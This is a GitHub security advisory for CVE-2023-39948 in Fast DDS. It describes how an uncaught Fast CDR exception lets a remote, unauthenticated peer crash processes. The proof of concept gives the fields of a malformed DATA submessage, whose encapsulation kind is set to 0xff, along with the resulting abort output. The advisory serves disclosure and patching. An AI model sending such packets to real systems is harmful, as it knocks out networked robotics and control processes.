Skip to content

Uncaught fastcdr exception (Unexpected CDR type received) crashing fastdds

High
MiguelCompany published GHSA-x9pj-vrgf-f68f Aug 11, 2023

Package

Fast-DDS

Affected versions

< v2.10.0

Patched versions

>= v2.10.0 / v2.6.5

Description

Summary

This was reported as #3422.
Opening an advisory for CVE assignment as per the request of Miguel.

Details

BadParamException thrown by Fast CDR is not caught in Fast DDS, crashing Fast DDS processes.

PoC

  1. Run a subscriber process
  2. My endpoint goes through PDP and EDP with the subscriber
  3. When writers/readers and topic are matched, my endpoint sends the following DATA submessage to the matched subscriber:
submessageId: DATA (0x15)
    Flags: 0x05, Data present, Endianness bit
    octetsToNextHeader: 48
    0000 0000 0000 0000 = Extra flags: 0x0000
    Octets to inline QoS: 16
    readerEntityId: 0x00000104 (Application-defined reader (no key): 0x000001)
    writerEntityId: 0x00000103 (Application-defined writer (no key): 0x000001)
    [Topic Information (from Discovery)]
    writerSeqNumber: 1
    serializedData
        encapsulation kind: Unknown (0x00ff)
        encapsulation options: 0x0000
        serializedData: 000000000d0000004d65737361676520697320310000000

Note: encapsulation kind is 0xff (should have been 0x01).

Fast DDS crashes:

$ ./DDSSecureHelloWorldExample subscriber
Starting
Waiting for Data, press Enter to stop the DataReader.
Subscriber matched.
terminate called after throwing an instance of 'eprosima::fastcdr::exception::BadParamException'
  what():  Unexpected CDR type received in Cdr::read_encapsulation
[1]    1931236 abort      ./DDSSecureHelloWorldExample subscriber

Please refer to the attached tcpdump fastdds-assert.pcap.zip for further details. Packet 358 triggers this.

Impact

This can remotely crash any Fast DDS process.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-39948

Weaknesses

Credits